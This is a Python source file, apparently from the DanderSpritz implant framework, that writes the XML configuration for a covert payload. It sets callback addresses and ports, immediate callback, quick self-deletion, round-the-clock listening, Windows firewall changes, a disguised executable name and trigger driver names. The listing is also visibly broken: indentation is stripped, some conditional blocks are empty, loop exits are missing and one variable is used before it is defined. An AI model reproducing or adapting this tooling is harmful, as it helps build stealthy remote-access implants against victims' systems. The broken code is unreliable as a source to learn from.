341 lines
12 KiB
341 lines
12 KiB
# package pc2_2.payload.config
import dsz
import pc2_2
import re
def fixStringForXml(origStr):
newStr = origStr
if (len(newStr) > 0):
newStr = re.sub("&", "&", newStr)
newStr = re.sub("<", "<", newStr)
newStr = re.sub(">", ">", newStr)
return newStr
def SetCallbackInfo(type, advanced=True):
configLines = list()
callbackAddr = "";
if (type.lower() == "level3"):
addr = dsz.ui.GetString("Enter the callback address ( = no callback)")
while (not pc2_2.IsValidIpAddress(addr)):
addr = dsz.ui.GetString("Enter the callback address")
callbackAddr = addr;
configLines.append(" <CallbackAddress>%s</CallbackAddress>\n" % addr)
if (advanced or (callbackAddr != "")):
# check if they want to change the callback ports0
if (dsz.ui.Prompt("Change CALLBACK PORTS?", False)):
configLines.append(" <CallbackPorts>\n")
numPorts = 0
while (numPorts < 6):
dstPort = dsz.ui.GetInt("Enter callback DST port (0=no more ports)")
if (dstPort != 0):
srcPort = dsz.ui.GetInt("Enter callback SRC port", "0")
# no more ports
if ((dstPort < 0) or (dstPort > 65535) or
(srcPort < 0) or (srcPort > 65535)):
dsz.ui.Echo("* Invalid port value (must be between 0 and 65535)", dsz.ERROR)
configLines.append(" <CallbackPair>\n")
configLines.append(" <SrcPort>%u</SrcPort>\n" % srcPort)
configLines.append(" <DstPort>%u</DstPort>\n" % dstPort)
configLines.append(" </CallbackPair>\n")
numPorts = numPorts + 1
configLines.append(" </CallbackPorts>\n")
return configLines
def SetFlags(os, binType, type, defaultFlags, advanced=True):
configLines = list()
configLines.append(" <Flags>\n")
usingUB = False
for flag in defaultFlags:
if (len(flag) > 0):
configLines.append(" <%s/>\n" % flag)
usingUB = True
if (type.lower() == "level3"):
if (dsz.ui.Prompt("Perform IMMEDIATE CALLBACK?", False)):
configLines.append(" <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>\n")
if (binType.lower() == "exe"):
if (dsz.ui.Prompt("Enable QUICK SELF-DELETION?", False)):
configLines.append(" <PCHEAP_CONFIG_FLAG_QUICK_DELETE_SELF/>\n")
elif (type.lower() == "level4"):
if (dsz.ui.Prompt("Listen AT ALL TIMES?", False)):
configLines.append(" <PCHEAP_CONFIG_FLAG_24_HOUR/>\n")
if (advanced and (not usingUB) and (os == "winnt")):
if (dsz.ui.Prompt("Configure for install with UTILITYBURST?", False)):
if (advanced and (os == "winnt")):
if (not dsz.ui.Prompt("Update the Windows firewall when listening?")):
defaultWindowFlag = False
if (binType.lower() == "sharedlib"):
defaultWindowFlag = True
if (advanced and (os == "winnt")):
if (dsz.ui.Prompt("Disable window creation?", defaultWindowFlag)):
elif (defaultWindowFlag):
if (advanced and (os == "winnt") and (type.lower() == "level4")):
if (dsz.ui.Prompt("Disable shared status memory creation?", False)):
configLines.append(" </Flags>\n")
return configLines
def SetId(type, advanced=True):
configLines = list()
while (id == 0x7FFFFFFFFFFFFFFF):
id = dsz.ui.GetInt("Enter the PC ID", "0")
configLines.append(" <Id>0x%x</Id>\n" % id)
return configLines
def SetListenInfo(type, existingConfigLines, advanced=True):
configLines = list()
askForListenHours = True
askForListenPorts = True
if (type.lower() == "level3"):
if (advanced):
if (dsz.ui.Prompt("Change the number of LISTEN LOOPS?", False)):
loops = 0
while ((loops <= 0) or (loops > 36)):
loops = dsz.ui.GetInt("Enter the number of listen loops", "6")
configLines.append(" <ListenLoops>%u</ListenLoops>\n" % loops)
if (dsz.ui.Prompt("Change the LISTEN DURATION per loop?", False)):
duration = 0
while ((duration <= 0) or (duration > 3600)):
duration = dsz.ui.GetInt("Enter the listen duration (in seconds)", "300")
configLines.append(" <ListenDuration>%u</ListenDuration>\n" % duration)
# never ask for listen hours unless you're in advanced mode
askForListenHours = False
if (not dsz.ui.Prompt("Do you want to LISTEN?", True)):
# no need to ask for listen hours or ports anymore
askForListenHours = False
askForListenPorts = False
configLines.append(" <StartListenHour>0</StartListenHour>\n")
configLines.append(" <StopListenHour>0</StopListenHour>\n")
elif (type.lower() == "level4"):
# check for 24-hour before asking about listening hours
for line in existingConfigLines:
if (re.search("PCHEAP_CONFIG_FLAG_24_HOUR", line) != None):
askForListenHours = False
if (askForListenHours):
if (dsz.ui.Prompt("Change the LISTEN HOURS?", False)):
start = dsz.ui.GetInt("Enter the starting hour (0-24)")
stop = dsz.ui.GetInt("Enter the ending hour (0-24)")
configLines.append(" <StartListenHour>%u</StartListenHour>\n" % start)
configLines.append(" <StopListenHour>%u</StopListenHour>\n" % stop)
if (start == stop):
# start == stop means no listening, no need to ask for listen ports
askForListenPorts = False
# always check if they want to change the listen ports
if (askForListenPorts or advanced):
if (dsz.ui.Prompt("Change LISTEN PORTS?", False)):
configLines.append(" <ListenPorts>\n")
numPorts = 0
while (numPorts < 6):
port = dsz.ui.GetInt("Enter listening port (0=no more ports)")
if (port == 0):
# no more ports
if ((port < 0) or (port > 65535)):
dsz.ui.Echo("* Invalid port value (must be between 1 and 65535)", dsz.ERROR)
configLines.append(" <BindPort>%u</BindPort>\n" % port)
numPorts = numPorts + 1
configLines.append(" </ListenPorts>\n")
if (advanced):
if (dsz.ui.Prompt("Change LISTEN BIND ADDRESS", False)):
bindAddr = dsz.ui.GetString("Enter the listen bind address", "")
while (not pc2_2.IsValidIpAddress(bindAddr)):
bindAddr = dsz.ui.GetString("Enter the listen bind address", "")
configLines.append(" <ListenBindAddress>%s</ListenBindAddress>\n" % bindAddr)
return configLines
def SetMiscInfo(type, driverName="", procName="", infoValue="", advanced=True):
configLines = list()
if (type.lower() == "level3"):
if (dsz.ui.Prompt("Change exe name in version information?", False)):
origName = "fontreg.exe"
newName = dsz.ui.GetString("Enter the new name", origName)
while ((len(newName) < 10) or (len(newName) > 11)):
dsz.ui.Echo("Name length must be between 10 and 11 characters")
newName = dsz.ui.GetString("Enter the new name", "fontreg.exe")
configLines.append(" <InternalName>%s</InternalName>\n" % fixStringForXml(newName))
configLines.append(" <OriginalFilename>%s</OriginalFilename>\n" % fixStringForXml(newName))
if (type.lower() == "level4"):
if (len(driverName) > 0):
configLines.append(" <DriverName>%s</DriverName>\n" % fixStringForXml(driverName))
if (advanced and dsz.ui.Prompt("Change the TRIGGER DRIVER NAME?", False)):
name = dsz.ui.GetString("Enter the TRIGGER DRIVER NAME")
configLines.append(" <DriverName>%s</DriverName>\n" % fixStringForXml(name))
if (len(procName) > 0):
configLines.append(" <ProcessName>%s</ProcessName>\n" % fixStringForXml(procName))
if (advanced and dsz.ui.Prompt("Change the PROCESS NAME?", False)):
name = dsz.ui.GetString("Enter the PROCESS NAME")
configLines.append(" <ProcessName>%s</ProcessName>\n" % fixStringForXml(name))
if (len(infoValue) > 0):
configLines.append(" <InfoValue>%s</InfoValue>\n" % fixStringForXml(infoValue))
if (advanced and dsz.ui.Prompt("Change the INFO VALUE?", False)):
value = dsz.ui.GetString("Enter the INFO VALUE")
configLines.append(" <InfoValue>%s</InfoValue>\n" % fixStringForXml(value))
return configLines
def SetProxyInfo(commType, advanced=True):
configLines = list()
if (commType.lower() != "http"):
# nothing to configure
return configLines
if (dsz.ui.Prompt("Set the proxy address?", False)):
while True:
addr = dsz.ui.GetString("Enter the PROXY ADDRESS")
port = dsz.ui.GetInt("Enter the PROXY PORT")
if ((port > 0) and (port < 65535)):
configLines.append(" <ProxyAddress>%s</ProxyAddress>\n" % addr)
configLines.append(" <ProxyPort>%u</ProxyPort>\n" % port)
if (dsz.ui.Prompt("Set the proxy login?", False)):
login = dsz.ui.GetString("Enter the PROXY USERNAME")
passwd = dsz.ui.GetString("Enter the PROXY PASSWORD")
configLines.append(" <ProxyUser>%s</ProxyUser>\n" % fixStringForXml(login))
configLines.append(" <ProxyPassword>%s</ProxyPassword>\n" % fixStringForXml(passwd))
return configLines
def SetProxyConnectionParameters(commType, advanced=True):
configLines = list()
if (commType.lower() != "http"):
# nothing to configure
return configLines
if (dsz.ui.Prompt("Set the proxy connection parameters?", False)):
while True:
if (dsz.ui.Prompt("Change the default MAXIMUM DATA SEND SIZE?", False)):
maxDataPerSend = dsz.ui.GetInt("Enter the MAXIMUM DATA SEND SIZE")
if ((maxDataPerSend > 0) and (maxDataPerSend < 65535)):
configLines.append(" <MaxDataPerSend>%u</MaxDataPerSend>\n" % maxDataPerSend)
dsz.ui.Echo("* Valid values for MAXIMUM DATA SEND SIZE are 1024 - 65534")
while True:
if (dsz.ui.Prompt("Change the default WAIT TIME AFTER FAILURE?", False)):
waitTimeAfterFailure = dsz.ui.GetInt("Enter the WAIT TIME AFTER FAILURE (in seconds)")
if ((waitTimeAfterFailure > 0) and (waitTimeAfterFailure < 65535)):
configLines.append(" <WaitTimeAfterFailure>%u</WaitTimeAfterFailure>\n" % waitTimeAfterFailure)
dsz.ui.Echo("* Valid values for WAIT TIME AFTER FAILURE are 1 - 65534")
while True:
if (dsz.ui.Prompt("Change the default WAIT TIME BETWEEN SENDS?", False)):
waitTimeBetweenSends = dsz.ui.GetInt("Enter the WAIT TIME BETWEEN SENDS (in seconds)")
if ((waitTimeBetweenSends > 0) and (waitTimeBetweenSends < 65535)):
configLines.append(" <WaitTimeBetweenSends>%u</WaitTimeBetweenSends>\n" % waitTimeBetweenSends)
dsz.ui.Echo("* Valid values for WAIT TIME BETWEEN SENDS are 1 - 65534")
while True:
if (dsz.ui.Prompt("Change the default MAXIMUM SEND FAILURES?", False)):
maxSendFailures = dsz.ui.GetInt("Enter the MAXIMUM SEND FAILURES")
if ((maxSendFailures > 0) and (maxSendFailures < 65535)):
configLines.append(" <MaximumSendFailures>%u</MaximumSendFailures>\n" % maxSendFailures)
dsz.ui.Echo("* Valid values for MAXIMUM SEND FAILURES are 1 - 65534")
# while True:
# if (dsz.ui.Prompt("Change the default MAXIMUM DATA NODES?", False)):
# maxDataNodes = dsz.ui.GetInt("Enter the MAXIMUM DATA NODES")
# if ((maxDataNodes > 0) and (maxDataNodes < 65535)):
# configLines.append(" <MaximumDataNodes>%u</MaximumDataNodes>\n" % maxDataNodes)
# break
# else:
# break
return configLines